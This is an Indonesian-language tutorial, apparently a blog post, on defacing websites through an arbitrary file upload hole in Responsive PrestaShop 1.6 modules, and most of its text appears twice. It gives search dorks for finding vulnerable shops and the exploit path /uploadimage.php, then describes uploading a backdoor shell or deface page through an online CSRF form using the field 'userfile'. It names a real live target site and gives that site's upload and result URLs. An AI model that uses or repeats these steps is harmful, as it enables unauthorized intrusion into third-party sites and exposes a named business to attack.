Assalamualaikum Wr Wb
kembali lagi bersama saya yang gans ini ๐
kali ini saya akan memberikan tutorial deface metode
"Responsive Prestashop 1.6 Arbitrary File Upload"
oke langsung gaskeunn...
Bahan
1. Dork :
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"
2. Exploit : /uploadimage.php
3. CSRF : CSRF ONLINE
4. Shell backdoor atau script deface
5. Sabar ๐
- dorking dengan dork diatas tapi disini saya ada live target "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/"
- lalu masukan exploit nya jadi seperti ini
"http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/uploadimage.php"
- jika ada tulisan error seperti ini
- itu tandanya vuln tinggal kita masukan sitenya ke CSRF seperti gambar di
bawah ini, dengan POSTFILE : userfile
- lalu klik submit, setelah itu pilih file yang ingin kalian upload lalu klik upload
-jika berhasil maka akan muncul "success:namafilekalian.extensi" seperti di gambar di bawah
- lalu tinggal kita akses, dimana aksesnya ??, yaitu di
"/modules/namamodules/slides/filekalian"
- seperti ini "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/slides/luv.gif"
- dan yap kita sudah berhasil
ok mungkin cukup sekian tutorial dari saya
see you on the next tutorial
1. Dork :
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"
2. Exploit : /uploadimage.php
3. CSRF : CSRF ONLINE
4. Shell backdoor atau script deface
5. Sabar ๐
- dorking dengan dork diatas tapi disini saya ada live target "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/"
- lalu masukan exploit nya jadi seperti ini
"http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/uploadimage.php"
- jika ada tulisan error seperti ini
bawah ini, dengan POSTFILE : userfile
- lalu klik submit, setelah itu pilih file yang ingin kalian upload lalu klik upload
-jika berhasil maka akan muncul "success:namafilekalian.extensi" seperti di gambar di bawah
"/modules/namamodules/slides/filekalian"
- seperti ini "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/slides/luv.gif"
- dan yap kita sudah berhasil
ok mungkin cukup sekian tutorial dari saya
see you on the next tutorial